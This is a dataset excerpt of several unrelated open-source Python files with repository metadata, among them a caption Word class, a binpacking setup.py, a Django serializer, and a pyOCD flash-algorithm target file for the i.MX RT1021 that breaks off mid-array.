| 19.301115 | 77 | 0.551233 | 583 | 5,192 | 4.891938 | 0.253859 | 0.196003 | 0.241234 | 0.113254 | 0.691094 | 0.691094 | 0.670407 | 0.670407 | 0.662342 | 0.662342 | 0 | 0.012846 | 0.220339 | 5,192 | 268 | 78 | 19.373134 | 0.6917 | 0.106317 | 0 | 0.675 | 0 | 0 | 0.802227 | 0.094086 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016667 | false | 0 | 0.033333 | 0.008333 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8a57503a6633f2f8baf7df86d58438d08f1336a9 | 577 | py | Python | Word.py | shvms/getcc | 793afa1169b9cd17f3e2cb08d75476983edcdf66 | [
"MIT"
] | null | null | null | Word.py | shvms/getcc | 793afa1169b9cd17f3e2cb08d75476983edcdf66 | [
"MIT"
] | null | null | null | Word.py | shvms/getcc | 793afa1169b9cd17f3e2cb08d75476983edcdf66 | [
"MIT"
] | null | null | null | class Word():
"""docstring for Word"""
def __init__(self, text: str, start_time: float, end_time: float):
assert isinstance(text, str), "text should be string."
assert isinstance(start_time, float) and isinstance(end_time, float), "Start time and end time should be float values."
self.text = text
self.start_time = start_time
self.end_time = end_time
def __str__(self):
return "Word(text='{}', start_time={}s, end_time={}s)".format(self.text, self.start_time, self.end_time)
def __len__(self):
return self.end_time - self.start_time | 38.466667 | 123 | 0.694974 | 87 | 577 | 4.310345 | 0.275862 | 0.192 | 0.104 | 0.090667 | 0.106667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175043 | 577 | 15 | 124 | 38.466667 | 0.787815 | 0.031196 | 0 | 0 | 0 | 0 | 0.205776 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.272727 | false | 0 | 0 | 0.181818 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
8a82a7d606193266da3866ad697da9c45ea8a36e | 112 | py | Python | udemy/python-video-workbook/my_progress/009.py | djrgit/coursework | 2a91da9b76cb1acbd12f3d8049f15d2e71f475a1 | [
"MIT"
] | null | null | null | udemy/python-video-workbook/my_progress/009.py | djrgit/coursework | 2a91da9b76cb1acbd12f3d8049f15d2e71f475a1 | [
"MIT"
] | null | null | null | udemy/python-video-workbook/my_progress/009.py | djrgit/coursework | 2a91da9b76cb1acbd12f3d8049f15d2e71f475a1 | [
"MIT"
] | 3 | 2018-08-13T23:14:22.000Z | 2019-01-11T22:50:07.000Z | # Exercise 9 - Negative Slicing
letters = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"]
print(letters[-3:]) | 37.333333 | 60 | 0.482143 | 18 | 112 | 3 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021277 | 0.160714 | 112 | 3 | 61 | 37.333333 | 0.553191 | 0.258929 | 0 | 0 | 0 | 0 | 0.121951 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
8a936a5a038cc237d1bf6ea9f54c5c605ebcbe4e | 330 | py | Python | src/simfoni/apps/data_importer/api/serializers.py | django-stars/simfoni-test | eaca4adc8177505e7c53e708456fd0dbb6be0b71 | [
"MIT"
] | null | null | null | src/simfoni/apps/data_importer/api/serializers.py | django-stars/simfoni-test | eaca4adc8177505e7c53e708456fd0dbb6be0b71 | [
"MIT"
] | null | null | null | src/simfoni/apps/data_importer/api/serializers.py | django-stars/simfoni-test | eaca4adc8177505e7c53e708456fd0dbb6be0b71 | [
"MIT"
] | 4 | 2018-04-26T17:43:24.000Z | 2018-05-10T14:11:09.000Z | from rest_framework import serializers
from core.api.validators import FileMaxSizeValidator, ImportFileMimeTypeValidator
class ImportSerializer(serializers.Serializer):
file = serializers.FileField(
required=True, allow_null=False,
validators=[ImportFileMimeTypeValidator(), FileMaxSizeValidator(), ]
)
| 30 | 81 | 0.784848 | 27 | 330 | 9.518519 | 0.740741 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142424 | 330 | 10 | 82 | 33 | 0.908127 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.571429 | 0 | 0.857143 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
76d519e4155200bc7e3acb373bac07f746852b32 | 243 | py | Python | steroidsornot/pushshift.py | cedarmora/steroids-or-not | afa951dad1c18e0d2ccb24faea0f3efef6ec1178 | [
"Apache-2.0"
] | null | null | null | steroidsornot/pushshift.py | cedarmora/steroids-or-not | afa951dad1c18e0d2ccb24faea0f3efef6ec1178 | [
"Apache-2.0"
] | null | null | null | steroidsornot/pushshift.py | cedarmora/steroids-or-not | afa951dad1c18e0d2ccb24faea0f3efef6ec1178 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: 01_pushshift.ipynb (unless otherwise specified).
__all__ = []
# Cell
import os
import requests
import time
import datetime
import pickle
from requests.adapters import HTTPAdapter
import webbrowser | 18.692308 | 92 | 0.802469 | 32 | 243 | 5.9375 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009615 | 0.144033 | 243 | 13 | 93 | 18.692308 | 0.903846 | 0.390947 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.875 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
76e31c0c1738b71b8d700e3e4b3957416f797527 | 1,289 | py | Python | setup.py | mmohrhard/binpacking | 6ada2c62c319d56cd0f5918a2f01ff61d0e45348 | [
"MIT"
] | null | null | null | setup.py | mmohrhard/binpacking | 6ada2c62c319d56cd0f5918a2f01ff61d0e45348 | [
"MIT"
] | null | null | null | setup.py | mmohrhard/binpacking | 6ada2c62c319d56cd0f5918a2f01ff61d0e45348 | [
"MIT"
] | null | null | null | from setuptools import setup
setup(name='binpacking',
version='1.4.1',
description='Heuristic distribution of weighted items to bins (either a fixed number of bins or a fixed number of volume per bin). Data may be in form of list, dictionary, list of tuples or csv-file.',
url='https://www.github.com/benmaier/binpacking',
author='Benjamin F. Maier',
author_email='bfmaier@physik.hu-berlin.de',
license='MIT',
packages=['binpacking'],
setup_requires=['pytest-runner'],
install_requires=[
'numpy', 'future',
],
tests_require=['pytest', 'pytest-cov'],
dependency_links=[
],
entry_points = {
'console_scripts': [
'binpacking = binpacking.binpacking_binary:main',
],
},
classifiers=['License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7'
],
zip_safe=False)
| 40.28125 | 207 | 0.55159 | 132 | 1,289 | 5.318182 | 0.643939 | 0.162393 | 0.213675 | 0.185185 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017162 | 0.321955 | 1,289 | 31 | 208 | 41.580645 | 0.786041 | 0 | 0 | 0.133333 | 0 | 0.033333 | 0.512801 | 0.046548 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.033333 | 0 | 0.033333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
76fc2219d4a17df8de5e1d2dacf6769149c5bcda | 462 | py | Python | app_verifications/user/user_checks.py | kskarbinski/threads-api | c144c1cb51422095922310d278f80e4996c10ea0 | [
"MIT"
] | null | null | null | app_verifications/user/user_checks.py | kskarbinski/threads-api | c144c1cb51422095922310d278f80e4996c10ea0 | [
"MIT"
] | null | null | null | app_verifications/user/user_checks.py | kskarbinski/threads-api | c144c1cb51422095922310d278f80e4996c10ea0 | [
"MIT"
] | null | null | null | from app_verifications import BaseChecks
from app_data.users import users
class UserChecks(BaseChecks):
"""
Checks related to user/users.
All checks return True or False.
"""
def __init__(self, value=None, by="id", model=None):
super(UserChecks, self).__init__(container=users, value=value, by=by, model=model)
self.user_model = self.model
def check_user_exists(self):
return True if self.user_model else False
| 28.875 | 90 | 0.701299 | 64 | 462 | 4.84375 | 0.5 | 0.045161 | 0.083871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.203463 | 462 | 15 | 91 | 30.8 | 0.842391 | 0.134199 | 0 | 0 | 0 | 0 | 0.005263 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.125 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
76fc5a24ae6d762997a3763728d574e53554ae4f | 61,208 | py | Python | pyocd/target/builtin/target_MIMXRT1021xxxxx.py | LONGZR007/pyOCD | 2c5a20a267c2670db0c233487fefd262f5a7c181 | [
"Apache-2.0"
] | null | null | null | pyocd/target/builtin/target_MIMXRT1021xxxxx.py | LONGZR007/pyOCD | 2c5a20a267c2670db0c233487fefd262f5a7c181 | [
"Apache-2.0"
] | null | null | null | pyocd/target/builtin/target_MIMXRT1021xxxxx.py | LONGZR007/pyOCD | 2c5a20a267c2670db0c233487fefd262f5a7c181 | [
"Apache-2.0"
] | 1 | 2019-01-21T03:01:53.000Z | 2019-01-21T03:01:53.000Z | # pyOCD debugger
# Copyright (c) 2017 NXP
# Copyright (c) 2018 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ...flash.flash import Flash
from ...coresight.coresight_target import CoreSightTarget
from ...core.memory_map import (FlashRegion, RomRegion, RamRegion, MemoryMap)
from ...debug.svd.loader import SVDFile
from ..family.target_imxrt import IMXRT
FLASH_ALGO_QUADSPI = {
'load_address' : 0x20000000,
'instructions' : [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0x4605b570, 0x4616460c, 0xcc0fe002, 0x3e10c50f, 0xd2fa2e10, 0xd3022e08, 0xc503cc03, 0x2e043e08,
0xcc01d307, 0x1f36c501, 0x7821e003, 0x1c647029, 0x1e761c6d, 0xbd70d2f9, 0x4770ba40, 0x4770ba40,
0x4770ba40, 0x4770ba40, 0x4770ba40, 0x4770ba40, 0x4770ba40, 0x4770ba40, 0x4770ba40, 0x4770bac0,
0x4770bac0, 0x4770bac0, 0x4770bac0, 0x4770bac0, 0x4770bac0, 0x4770bac0, 0x4770bac0, 0x4770bac0,
0x4605b5fe, 0x460c4610, 0xd0734318, 0x468c46ae, 0x1aad2000, 0x419c4601, 0x4666d367, 0x24012700,
0x1ab6463d, 0xd302419d, 0x463a4613, 0x46652421, 0x042f4676, 0x433e0c36, 0x1ab60c2d, 0xd304419d,
0x041b0c15, 0x0412432b, 0x46653410, 0x062f4676, 0x433e0a36, 0x1ab60a2d, 0xd304419d, 0x021b0e15,
0x0212432b, 0x46653408, 0x072f4676, 0x433e0936, 0x1ab6092d, 0xd304419d, 0x011b0f15, 0x0112432b,
0x46651d24, 0x07af4676, 0x433e08b6, 0x1ab608ad, 0xd304419d, 0x009b0f95, 0x0092432b, 0x46651ca4,
0x07ef4676, 0x433e0876, 0x1ab6086d, 0xd31a419d, 0x415b1892, 0xe0161c64, 0x46761800, 0x41494665,
0x419d1ab7, 0x90009101, 0x4660d309, 0x41981ab1, 0x4684468e, 0x99019800, 0x1c402500, 0x07dd4169,
0x432a0852, 0x1e64085b, 0x4672d5e6, 0xb0034663, 0xe7ffbdf0, 0x46012000, 0x46c046c0, 0x4623462a,
0xb510e7f5, 0xf0002000, 0x46c0f907, 0x200146c0, 0xf8fcf000, 0x4603bd10, 0x430bb510, 0xd10f079b,
0xd30d2a04, 0xc910c808, 0x42a31f12, 0xba18d0f8, 0x4288ba21, 0x2001d901, 0x2000bd10, 0xbd1043c0,
0xd0032a00, 0xd00307d3, 0xe0071c52, 0xbd102000, 0x780c7803, 0x1c491c40, 0xd1071b1b, 0x780c7803,
0x1c491c40, 0xd1011b1b, 0xd1f11e92, 0xbd104618, 0xc004e001, 0x29041f09, 0x078bd2fb, 0x8002d501,
0x07c91c80, 0x7002d000, 0x29004770, 0x07c3d00b, 0x7002d002, 0x1e491c40, 0xd3042902, 0xd5020783,
0x1c808002, 0xe7e31e89, 0xe7ee2200, 0xe7df2200, 0x09032200, 0xd32c428b, 0x428b0a03, 0x2300d311,
0xe04e469c, 0x430b4603, 0x2200d43c, 0x428b0843, 0x0903d331, 0xd31c428b, 0x428b0a03, 0x4694d301,
0x09c3e03f, 0xd301428b, 0x1ac001cb, 0x09834152, 0xd301428b, 0x1ac0018b, 0x09434152, 0xd301428b,
0x1ac0014b, 0x09034152, 0xd301428b, 0x1ac0010b, 0x08c34152, 0xd301428b, 0x1ac000cb, 0x08834152,
0xd301428b, 0x1ac0008b, 0x08434152, 0xd301428b, 0x1ac0004b, 0x1a414152, 0x4601d200, 0x46104152,
0xe05d4770, 0xd0000fca, 0x10034249, 0x4240d300, 0x22004053, 0x0903469c, 0xd32d428b, 0x428b0a03,
0x22fcd312, 0xba120189, 0x428b0a03, 0x0189d30c, 0x428b1192, 0x0189d308, 0x428b1192, 0x0189d304,
0x1192d03a, 0x0989e000, 0x428b09c3, 0x01cbd301, 0x41521ac0, 0x428b0983, 0x018bd301, 0x41521ac0,
0x428b0943, 0x014bd301, 0x41521ac0, 0x428b0903, 0x010bd301, 0x41521ac0, 0x428b08c3, 0x00cbd301,
0x41521ac0, 0x428b0883, 0x008bd301, 0x41521ac0, 0x0843d2d9, 0xd301428b, 0x1ac0004b, 0x1a414152,
0x4601d200, 0x41524663, 0x4610105b, 0x4240d301, 0xd5002b00, 0x47704249, 0x105b4663, 0x4240d300,
0x2000b501, 0x46c046c0, 0x0000bd02, 0x20184901, 0xe7febeab, 0x00020026, 0xf000b510, 0xf000f80b,
0xbd10f802, 0xb5104770, 0xd0012800, 0xffeef7ff, 0x0000bd10, 0x2100b510, 0xf000a002, 0x2001f813,
0x0000bd10, 0x41474953, 0x3a545242, 0x6e624120, 0x616d726f, 0x6574206c, 0x6e696d72, 0x6f697461,
0x0000006e, 0x4605b570, 0x200a460c, 0x1c6de000, 0xf812f000, 0xd0062d00, 0x28007828, 0xe002d1f7,
0xf0001c64, 0x2c00f809, 0x7820d002, 0xd1f72800, 0xf000200a, 0xbd70f801, 0x4669b508, 0x20037008,
0xbd08beab, 0x06c00a02, 0x0ec0b510, 0xd9012a06, 0xfea7f7ff, 0x00924b05, 0x681318d2, 0x40842403,
0x408143a3, 0x6013430b, 0x0000bd10, 0x400fc068, 0x06c00a02, 0x0ec0b510, 0xd9012a06, 0xfe91f7ff,
0x00924b05, 0x681318d2, 0x40842403, 0x408143a3, 0x6013430b, 0x0000bd10, 0x400fc068, 0x49022001,
0x63080300, 0x00004770, 0x400d8040, 0x49022001, 0x62080300, 0x00004770, 0x400d80c0, 0x49022001,
0x61480780, 0x00004770, 0x400d8140, 0x6b014802, 0x00490849, 0x47706301, 0x400d8240, 0x680a4903,
0x208000c3, 0x43024098, 0x4770600a, 0x400d8100, 0x49022001, 0x63080300, 0x00004770, 0x400d8000,
0x6b0a4903, 0x208000c3, 0x43024098, 0x4770630a, 0x400d80c0, 0x20004901, 0x47706108, 0x400d8000,
0x20004904, 0x48046108, 0x04826b01, 0x63014311, 0x00004770, 0x400d8000, 0x400d9000, 0x480eb508,
0x22036801, 0x60014311, 0x6801480c, 0x43112202, 0x20006001, 0x480a9000, 0x9900bf00, 0x91001c49,
0xd3f94281, 0x6a084907, 0x0212221f, 0x4a064390, 0x62084310, 0xbd082001, 0x400fc080, 0x402e0140,
0x00061a80, 0x400d8100, 0x00001701, 0x2200b508, 0x92004668, 0xfa7af000, 0x6b014808, 0x08490049,
0x6b016301, 0x43990483, 0x60026301, 0x22636b01, 0x43110392, 0x20016301, 0x0000bd08, 0x400d9000,
0x4c34b510, 0xf0010003, 0x0d17f843, 0x362a120d, 0x3e3c6339, 0x63444240, 0x4e4c4a48, 0x59565450,
0x00635f5c, 0xf870f000, 0x0a896961, 0x6960e011, 0xd50a0640, 0x06006960, 0x2001d503, 0xf966f000,
0x2002e005, 0xf93cf000, 0xf000e001, 0x6961f85d, 0x07490c09, 0x1c490f49, 0xfe1af7ff, 0xf000bd10,
0x6961f853, 0x0f4904c9, 0xf7ff1c49, 0x6961fe11, 0x0f890589, 0xf000e7ef, 0xbd10f837, 0x03c02001,
0x4815bd10, 0x2000e021, 0x2001e004, 0x2002e002, 0x2003e000, 0xf93af000, 0x4810bd10, 0x2000e015,
0x2001e004, 0x2002e002, 0x2003e000, 0xf908f000, 0x480bbd10, 0x480ae009, 0xe0061dc0, 0x30084808,
0x4807e003, 0xe0003009, 0xf0004806, 0xbd10f85f, 0xbd102000, 0x400fc000, 0x0010000d, 0x0030000d,
0x00e0000d, 0x0070000d, 0x6b004804, 0xd50106c0, 0x47704803, 0x44484803, 0x47706800, 0x400d8240,
0x016e3600, 0x00000050, 0x4c1cb510, 0x01816960, 0x69a1481b, 0x1202d517, 0xd00d4011, 0x03122201,
0xd00d1a89, 0xd0084291, 0x69612000, 0x0f490089, 0xf7ff1c49, 0xbd10fdad, 0xf0004812, 0xe7f4f827,
0xffd2f7ff, 0x2203e7f1, 0x40110492, 0x2201d00b, 0x1a880492, 0x1a80d00a, 0x4290d00c, 0x480ad101,
0x2000bd10, 0xf000bd10, 0xbd10f811, 0xf0002003, 0xbd10f8a7, 0xf0002003, 0xbd10f8c9, 0x400fc000,
0x0030000d, 0x0010000d, 0x1dcd6500, 0x4605b5f0, 0xb0854843, 0xc80f4478, 0xc40f466c, 0x01284e41,
0x59f00d07, 0x0ed206ea, 0x40912101, 0xd00a4008, 0x040059f0, 0xd0080f80, 0x46042000, 0x03c059f0,
0xd0050fc0, 0xb0054620, 0xf7ffbdf0, 0xe7f4ff8d, 0x4b344935, 0x33c01a68, 0x428d466a, 0xdc31d056,
0x18284832, 0x2101d046, 0x4f310549, 0xd02f1a40, 0x42880049, 0x6b38d12a, 0x0646492d, 0x31400e76,
0x4620690d, 0xf0006809, 0x462aff2b, 0xf7ff2300, 0x4374fc67, 0x18206b39, 0x04d22203, 0xd0314011,
0x04d22201, 0xd1004291, 0x49220840, 0x4a226b09, 0x22014011, 0x1a8903d2, 0x0212d026, 0xd1c24291,
0xe7c00880, 0xd0232807, 0xd0272808, 0xe7ba2000, 0x46206a3d, 0xf0006939, 0x462aff03, 0xf7ff2300,
0x6b31fc3f, 0xd00107c9, 0xe0002116, 0x434c2114, 0xe7a81820, 0x07806930, 0x2016d001, 0x2014e000,
0xe7a04360, 0xe7d00880, 0xe79c0840, 0xe0016a18, 0x08806a18, 0x0f000780, 0xe7945810, 0xe7924807,
0x00003f40, 0x400d8000, 0x00e0000d, 0xffeffff3, 0x400d8040, 0x400d8140, 0x00808000, 0x017d7840,
0x4604b510, 0xf7ff480f, 0x490fff61, 0xd0092c00, 0xd0092c01, 0xd00e2c02, 0xd00f2c03, 0x21122000,
0xbd104348, 0xe0016809, 0x0a096809, 0x0e890689, 0xfccef7ff, 0x6809e7f3, 0xe7f70c09, 0x0e096809,
0x0000e7f4, 0x0030000d, 0x400d8100, 0x4604b510, 0xf7ff480f, 0x490fff3b, 0xd0092c00, 0xd0092c01,
0xd00e2c02, 0xd00f2c03, 0x21122000, 0xbd104348, 0xe0016b09, 0x0a096b09, 0x0e890689, 0xfca8f7ff,
0x6b09e7f3, 0xe7f70c09, 0x0e096b09, 0x0000e7f4, 0x0010000d, 0x400d80c0, 0x6841b530, 0x008b2200,
0x089b4918, 0x6883600b, 0x089b009b, 0x7801610b, 0x06492301, 0x0e49035b, 0x18c97840, 0x2802019d,
0x4b11d01d, 0x2804006c, 0x2808d017, 0x2810d013, 0x4321d00f, 0x33c04b0b, 0x4c0b6b18, 0x402043e4,
0x63184310, 0x38404807, 0x6b016301, 0xdafc2900, 0x461abd30, 0x4329e7ee, 0x4321e7fb, 0x4329e7f9,
0x0000e7e8, 0x400d8080, 0x00808000, 0x79027941, 0x07920789, 0x0f920f09, 0x78024311, 0xd0022a00,
0x03522201, 0x78424311, 0xd0022a00, 0x05122201, 0x78824311, 0xd0022a00, 0x05522201, 0x78c04311,
0xd0022800, 0x05802001, 0x48034301, 0x6a016201, 0xdafc2900, 0x00004770, 0x400d80c0, 0x2800b510,
0xf7ffd001, 0x2101fbde, 0x07894807, 0x49076181, 0x03d26b0a, 0x2201d5fc, 0x61420412, 0x04096901,
0x6182d5fc, 0x0000bd10, 0x400d8140, 0x400d8240, 0x6b014802, 0x43112201, 0x47706301, 0x400d8240,
0x4b08b510, 0x00c0681a, 0x408424bf, 0x248043a2, 0x43144084, 0x0689601c, 0x40810e89, 0x60194311,
0x0000bd10, 0x400d8100, 0x21017800, 0x0fc007c0, 0x18410349, 0x63014802, 0x29006b01, 0x4770dafc,
0x400d8000, 0x4b08b510, 0x00c06b1a, 0x408424bf, 0x248043a2, 0x43144084, 0x0689631c, 0x40810e89,
0x63194311, 0x0000bd10, 0x400d80c0, 0x21c17800, 0x0f800780, 0x18410189, 0x61014802, 0x29006901,
0x4770dafc, 0x400d8000, 0x49032210, 0xd0012800, 0x4770638a, 0x4770634a, 0x400d8240, 0xb5104906,
0x22002301, 0x444904db, 0xf0014610, 0x4803fd98, 0x68404448, 0x0000bd10, 0x0000005c, 0x00000004,
0x49050102, 0x0912b510, 0x20004449, 0xfea2f001, 0x44494902, 0xbd106048, 0x0000005c, 0x00000004,
0xf3bfb57c, 0xf3bf8f4f, 0x48188f6f, 0x22016a41, 0x43910412, 0x48156241, 0x69413080, 0x00490849,
0x49136141, 0x62881740, 0x630862c8, 0x63886348, 0x490f63c8, 0x60083140, 0xfd98f000, 0xf926f003,
0x2500480c, 0x9000490c, 0x4449466a, 0x46289501, 0xfd20f002, 0x49084c09, 0x6060444c, 0x20004449,
0xfec2f001, 0x70256060, 0x0000bd7c, 0xe000ed00, 0x400fc040, 0xc0000005, 0x0000005c, 0x00000004,
0xb5104805, 0x68414448, 0xd0032900, 0xf0004803, 0xbd10f96f, 0xfb05f7ff, 0x0000025c, 0x40184000,
0xf7ffb510, 0xbd10ffed, 0xb5104805, 0x68814448, 0xd0032900, 0xf0004803, 0xbd10f95b, 0xfaf1f7ff,
0x0000025c, 0x40188000, 0xf7ffb510, 0xbd10ffed, 0xb5104805, 0x68c14448, 0xd0032900, 0xf0004803,
0xbd10f947, 0xfaddf7ff, 0x0000025c, 0x4018c000, 0xf7ffb510, 0xbd10ffed, 0xb5104805, 0x69014448,
0xd0032900, 0xf0004803, 0xbd10f933, 0xfac9f7ff, 0x0000025c, 0x40190000, 0xf7ffb510, 0xbd10ffed,
0xb5104805, 0x69414448, 0xd0032900, 0xf0004803, 0xbd10f91f, 0xfab5f7ff, 0x0000025c, 0x40194000,
0xf7ffb510, 0xbd10ffed, 0x460cb510, 0x29006989, 0x2141d103, 0xf0000549, 0x2000f887, 0x20026120,
0x73603420, 0xb510bd10, 0x2103460c, 0xf0000589, 0x2000f87b, 0x34206060, 0xbd107320, 0x460bb510,
0x079a6a81, 0x00890889, 0x430a0f92, 0x69416282, 0x00490fda, 0x07d20849, 0x490b430a, 0x400a4c0a,
0x43e44619, 0x43114021, 0x03a42401, 0x43a1461a, 0x430a4022, 0x43116941, 0xf0006141, 0x4018f8d1,
0x4802d000, 0x0000bd10, 0xbfe0ffff, 0x0000051a, 0x461eb5f8, 0x000c4617, 0xd0264605, 0x46202130,
0xfab4f7ff, 0x46202102, 0x73413020, 0x73012100, 0x62a66267, 0x21106ae8, 0x62e84388, 0xf0004628,
0x4a0bf871, 0x444a0081, 0x490a5054, 0x44790040, 0x28005e08, 0x06c2db08, 0x21010ed2, 0x09404091,
0x00804a05, 0x60011880, 0xf7ffbdf8, 0x0000fa3a, 0x0000025c, 0x00003962, 0xe000e100, 0x6ac1b510,
0x0f490549, 0x6941d1fb, 0xd5fc0249, 0x61812100, 0xf848f000, 0x00404903, 0x5e084479, 0xf7ff2100,
0xbd10fb87, 0x0000392a, 0x23c06902, 0x021b400b, 0x6102439a, 0x078b6a82, 0x439a0d9b, 0x0a096282,
0x02096982, 0x6182438a, 0x69024770, 0x400b23c0, 0x431a021b, 0x6a826102, 0x0d9b078b, 0x6282431a,
0x69820a09, 0x430a0209, 0x47706182, 0x2800b510, 0x21e1d00a, 0x60010249, 0x71012100, 0x71817141,
0x720171c1, 0xbd107241, 0xf9ebf7ff, 0x22c06901, 0x40110a09, 0x69806a82, 0x0f920592, 0x4310430a,
0x00004770, 0xb5104a08, 0x20004601, 0x0083447a, 0x428b58d3, 0x1c40d003, 0xd3f82808, 0x2808e001,
0xf7ffd301, 0xbd10f9ce, 0x00003860, 0x5c40202d, 0xd0072802, 0xd0072a00, 0x69096948, 0x60101a40,
0x47702000, 0x47702006, 0x47702004, 0x8c0a8c48, 0x8c084290, 0x69cad901, 0x8c491880, 0x47701a40,
0x5c40202c, 0xd0072800, 0xd0072a00, 0x68496888, 0x60101a40, 0x47702000, 0x47702006, 0x47702004,
0x6a806941, 0x0c0022c3, 0x43084010, 0x47704770, 0x4605b5f8, 0x460c6940, 0xd50d0300, 0x466969e8,
0x78087008, 0x70081c40, 0x2e006a66, 0x4a5ed004, 0x46284621, 0x47b06aa3, 0x02816968, 0x30204620,
0x29009000, 0x69a8da71, 0xd56e0280, 0x01406ae8, 0xe0260f46, 0x42b06920, 0x6920d201, 0x4630e000,
0xb2c168e2, 0xe0022000, 0x541369eb, 0x460b1c40, 0xd3f94288, 0x184068e0, 0x692060e0, 0x61201a40,
0xb2c61af0, 0x28006920, 0x9800d10b, 0x73412102, 0x2f006a67, 0x4a44d005, 0x1f924621, 0x6aa34628,
0x2e0047b8, 0x6920d002, 0xd1d32800, 0x280069a0, 0xe032d12d, 0x46284621, 0xf926f000, 0xd0082800,
0x2f006a67, 0x4a38d005, 0x1e524621, 0x6aa34628, 0x462147b8, 0xf0004628, 0x2800f917, 0x8c60d009,
0x1c4069e1, 0xd1014288, 0xe0012000, 0x1c408c60, 0x69e88460, 0x69a18c22, 0x8c205488, 0x1c4069e1,
0xd1014288, 0xe0012000, 0x1c408c20, 0x46308420, 0xb2f61e76, 0xd1cd2800, 0x6920e007, 0xd1042800,
0x05492141, 0xf7ff4628, 0x6968feef, 0xd5390200, 0x020069a8, 0x6ae8d536, 0x05402104, 0x1a080f40,
0xe02ab2c6, 0x42b06860, 0x6860d201, 0x4630e000, 0xb2c16822, 0xe0022000, 0x61eb5c13, 0x460b1c40,
0xd3f94288, 0x18406820, 0x68606020, 0x60601a40, 0xb2c61af0, 0x28006860, 0x9900d10f, 0x69a87308,
0x05c92101, 0x61a84388, 0x2f006a67, 0x4a06d005, 0x1fd24621, 0x6aa34628, 0x2e0047b8, 0x6860d002,
0xd1cf2800, 0x0000bdf8, 0x0000051d, 0xb086b5f7, 0x4604000f, 0x6838d009, 0x28009005, 0x79b8d005,
0xd8022804, 0x280479f8, 0xf7ffd901, 0x9805f8ba, 0x20009000, 0x25049001, 0x99059002, 0x43699808,
0xf906f7ff, 0x0c360406, 0x2601d100, 0x43714629, 0xf7ff9808, 0x9905f8fd, 0x1c701a41, 0x46299103,
0x43419004, 0xf7ff9808, 0x9905f8f3, 0x99031a08, 0xd2024288, 0x98049003, 0x9900b286, 0x42889803,
